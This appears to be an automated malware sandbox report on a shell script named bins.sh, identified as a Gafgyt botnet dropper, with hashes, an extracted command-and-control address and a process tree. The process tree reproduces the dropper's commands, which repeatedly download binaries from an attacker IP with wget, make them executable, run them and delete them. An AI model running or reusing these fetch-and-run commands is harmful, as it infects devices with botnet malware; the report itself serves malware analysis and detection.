Analysis
-
max time kernel
121s -
max time network
123s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
26/02/2025, 16:57
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
1KB
-
MD5
3fe001266d6743a61f371e35d18a362a
-
SHA1
63e6fb3e130d0204b47845ea33234d2aebf318de
-
SHA256
409f0f68302f6d7e81372c924901b89c01d6d64df78dad529e4b5edf2c15b4a1
-
SHA512
1cb24458f4848eeb53f34e495e0ca349eefaf86082ca024b2f958ed55ad41c2abc4022aee3d4e1e9333cc67f75f274e9090838ba12fb84c42018f9a7ba9dda46
Malware Config
Extracted
gafgyt
185.224.0.18:23
Signatures
-
Detected Gafgyt variant 11 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_gafgyt behavioral3/files/fstream-2.dat family_gafgyt behavioral3/files/fstream-3.dat family_gafgyt behavioral3/files/fstream-4.dat family_gafgyt behavioral3/files/fstream-5.dat family_gafgyt behavioral3/files/fstream-6.dat family_gafgyt behavioral3/files/fstream-7.dat family_gafgyt behavioral3/files/fstream-8.dat family_gafgyt behavioral3/files/fstream-9.dat family_gafgyt behavioral3/files/fstream-10.dat family_gafgyt behavioral3/files/fstream-11.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 845 chmod 862 chmod 868 chmod 779 chmod 788 chmod 798 chmod 832 chmod 873 chmod 762 chmod 774 chmod 784 chmod 793 chmod 811 chmod -
Executes dropped EXE 11 IoCs
ioc pid Process /tmp/ntpd 764 bins.sh /tmp/sshd 775 bins.sh /tmp/openssh 780 bins.sh /tmp/tftp 789 bins.sh /tmp/wget 794 bins.sh /tmp/cron 799 bins.sh /tmp/ftp 812 bins.sh /tmp/pftp 833 bins.sh /tmp/sh 846 bins.sh /tmp/[cpu] 863 bins.sh /tmp/apache2 869 bins.sh -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route ntpd -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 764 ntpd -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route ntpd -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cron wget File opened for modification /tmp/ftp wget File opened for modification /tmp/sh wget File opened for modification /tmp/ntpd wget File opened for modification /tmp/sshd wget File opened for modification /tmp/wget wget File opened for modification /tmp/pftp wget File opened for modification /tmp/[cpu] wget File opened for modification /tmp/apache2 wget File opened for modification /tmp/openssh wget File opened for modification /tmp/tftp wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:740 -
/usr/bin/wgetwget http://185.224.0.18/ntpd2⤵
- Writes file to tmp directory
PID:743
-
-
/bin/chmodchmod +x ntpd2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/ntpd./ntpd2⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:764
-
-
/bin/rmrm -rf ntpd2⤵PID:767
-
-
/usr/bin/wgetwget http://185.224.0.18/sshd2⤵
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod +x sshd2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/sshd./sshd2⤵PID:775
-
-
/bin/rmrm -rf sshd2⤵PID:777
-
-
/usr/bin/wgetwget http://185.224.0.18/openssh2⤵
- Writes file to tmp directory
PID:778
-
-
/bin/chmodchmod +x openssh2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/openssh./openssh2⤵PID:780
-
-
/bin/rmrm -rf openssh2⤵PID:782
-
-
/usr/bin/wgetwget http://185.224.0.18/bash2⤵PID:783
-
-
/bin/chmodchmod +x bash2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/bash./bash2⤵PID:785
-
-
/bin/rmrm -rf bash2⤵PID:786
-
-
/usr/bin/wgetwget http://185.224.0.18/tftp2⤵
- Writes file to tmp directory
PID:787
-
-
/bin/chmodchmod +x tftp2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/tftp./tftp2⤵PID:789
-
-
/bin/rmrm -rf tftp2⤵PID:791
-
-
/usr/bin/wgetwget http://185.224.0.18/wget2⤵
- Writes file to tmp directory
PID:792
-
-
/bin/chmodchmod +x wget2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/wget./wget2⤵PID:794
-
-
/bin/rmrm -rf wget2⤵PID:796
-
-
/usr/bin/wgetwget http://185.224.0.18/cron2⤵
- Writes file to tmp directory
PID:797
-
-
/bin/chmodchmod +x cron2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/cron./cron2⤵PID:799
-
-
/bin/rmrm -rf cron2⤵PID:803
-
-
/usr/bin/wgetwget http://185.224.0.18/ftp2⤵
- Writes file to tmp directory
PID:804
-
-
/bin/chmodchmod +x ftp2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/ftp./ftp2⤵PID:812
-
-
/bin/rmrm -rf ftp2⤵PID:815
-
-
/usr/bin/wgetwget http://185.224.0.18/pftp2⤵
- Writes file to tmp directory
PID:817
-
-
/bin/chmodchmod +x pftp2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/pftp./pftp2⤵PID:833
-
-
/bin/rmrm -rf pftp2⤵PID:836
-
-
/usr/bin/wgetwget http://185.224.0.18/sh2⤵
- Writes file to tmp directory
PID:838
-
-
/bin/chmodchmod +x sh2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/sh./sh2⤵PID:846
-
-
/bin/rmrm -rf sh2⤵PID:850
-
-
/usr/bin/wgetwget "http://185.224.0.18/[cpu]"2⤵
- Writes file to tmp directory
PID:852
-
-
/bin/chmodchmod +x "[cpu]"2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/[cpu]"./[cpu]"2⤵PID:863
-
-
/bin/rmrm -rf "[cpu]"2⤵PID:865
-
-
/usr/bin/wgetwget http://185.224.0.18/apache22⤵
- Writes file to tmp directory
PID:866
-
-
/bin/chmodchmod +x apache22⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/apache2./apache22⤵PID:869
-
-
/bin/rmrm -rf apache22⤵PID:871
-
-
/usr/bin/wgetwget http://185.224.0.18/telnetd2⤵PID:872
-
-
/bin/chmodchmod +x telnetd2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/telnetd./telnetd2⤵PID:874
-
-
/bin/rmrm -rf telnetd2⤵PID:875
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
139KB
MD5ad3b88f90f89cd8c724d159f7f95a0b5
SHA12bc8029b17b387cc85c5a0b26e261235b0ea7c7e
SHA256293b468b4a255880846ddc28e5900c2ca6f3dc60abfb9952c6267fe1eeaeed84
SHA5123819a3c424474101b368bebcaca69a5003652f6921bbedb69192422e6ad9ba3ee7ffc6db96f35cff52eaff36974bab0fa19ff12c527c9ffcc91db5fc29d936bd
-
Filesize
132KB
MD5d68f347c491696a4a404ec56ce918b99
SHA1036421b825a71f1d27502e9ee2c66e1a9d56fdbc
SHA25659f0a1d17b840ea70363ba76f602ba2bd8aeff804060585814753afe5b1ead1b
SHA512decab46b0f4c4f4577399576c64eb6a35362360b9cf9d545ed4bb7f75b7e63499a24862d16b6112101f80f5731dfd316c2091b3924eb3d370b8f21c6c88aa8a6
-
Filesize
126KB
MD51019ae676f2b186d80b4a64e4d7ce979
SHA174052602698124537501c89ffb1cf20f96f16351
SHA256de2e2ca7485edbcb2ab5ad35a2d4911d2bcd9b71365f54a5c0d7c37ab584b55b
SHA5124ee1c8456117e308cc8b3baacf28c2e42dd878c16c568973219b06fb48ff540b2cbda3ebfaa16a5c64ff8e6ca9159cc224288bf4854095e26d34c5319320d3bd
-
Filesize
113KB
MD5ba20264e5784f53f593fa0895f77c0b2
SHA18e9f5d9a92a918f3cd5da0a19d866918edbdcd97
SHA256da6a2d0e481b64336f781b8f9f5b83816b1d1d3fef19907e8c85014c6bf87eb2
SHA512b5eda9e190524f64c58ab1c9326e036920604c22558421ab5d5b59ddd91b703c3901924a12ce704859cd850c4aa2c8d2c62d6a0126f086747b14df2d4996904b
-
Filesize
161KB
MD5109318b8402297c86da949e68b59d245
SHA1eb89f87d56e1af243d352065c3678d2b8854e6c0
SHA256401b52db675d8763850c287d7483a4c35d94ac4571a27475318893a2c727797a
SHA51258fc185b0d7c52eea48ec4d38d6f6889b5945d7947743241f6b4cf701a8a6bf9b8aef75a51bda7412fcc40bc04e8c29758a96865a5cde10fd321618f68f21792
-
Filesize
120KB
MD5bdbfff5bdf44a00110d4a749d56cbacd
SHA17a8a78030b15dfdbef6b1413813f0ac49168b076
SHA2564cff7e838e506a4b0d3c8c90032d9117a5ee16f400eab5bfeae2e7dd2c8a74b5
SHA512bbc3e2a644ae927bb4d9b3016cf4dff8b3444f3e87a44687420aa32e29cd102778d5882599d3583d53c213ad8f3d045988a22f11c76ea0083999104e51d49763
-
Filesize
131KB
MD589d38a917792864e1658397e216d7919
SHA1761d242b6b15c3baf83dc60b0ea574251c86a6a8
SHA2566097eeb660e58ca8d3dfedc76f3a6def567538d1427233f8b44b19d1e42bb5c3
SHA512734cd606af808bb7965429f597f8beb3304dc28a275c96da0268db96adf2df8109e9feb60911724813589eacf8f83930970e79536a581bf0fc96e8597dcfbfda
-
Filesize
142KB
MD51a29d5764ebdedbf96b4171d8b53c875
SHA125db69f73d154ccab06109eeb9e1a6876201a08f
SHA256b1fea583e42919e9b71fc9a6ca8b7d20aef45a63e2a9b8ddea36bb1ed884ef09
SHA51284041c3db086133c1d3dce3fea02eda526d5629681709dc74ff2777e560d2e62343877d07a341d3bb656859f717c9baae6f79203c68e995c06e9db64b98cdc81
-
Filesize
161KB
MD5c508e7ace15264e5ff4f463432c3a32e
SHA132e29ac335a2eff62ce938e43ad993324dd3ded8
SHA256f255756df50c2a912392e95adf2f42adfb546880aea8d6bf15162d1e2a7f2dd9
SHA51271b4a88fe38ecb7cab6463d9b36fa2e783d342f53f3362fa48cb4fd3f827daa0dc96afeed5b4abbe46473b821b785b3de9963f9b04fc7ec26badde2f3df67afd
-
Filesize
154KB
MD5fb60037e32b5ef7ea135dff35b6114ea
SHA1f95f587f124d66b985611ed9d571d8622a481676
SHA2563a4fc36dee8b7024bedec2c2345a7ac8a7d54b65fa000eed778c70d7443d8402
SHA51265a3c8ee7e26d734169e850b4c11f724f2b6d23b96458200b8e8994760054114562aacae2f78d70900e6516fd80dff2787284a64bf2778130c54cb64ac002c8b
-
Filesize
116KB
MD57f3328ac731e1f5914ddf381df585f6d
SHA1e60b12d8c77e90bcd3ce00e3d392c7d82ea0fe4b
SHA256874619d177f349b3987c881b016feaa08fec5a16df7cb2ab473d88ea493a4c56
SHA5126d1f5c755460da3740ee81362d617e7a52f1908253e6959e1a3d127cd831e88895b01bf47bfb57c7357c8bb5d0f743e700ca7db27e601b7b08adf5f09edd4418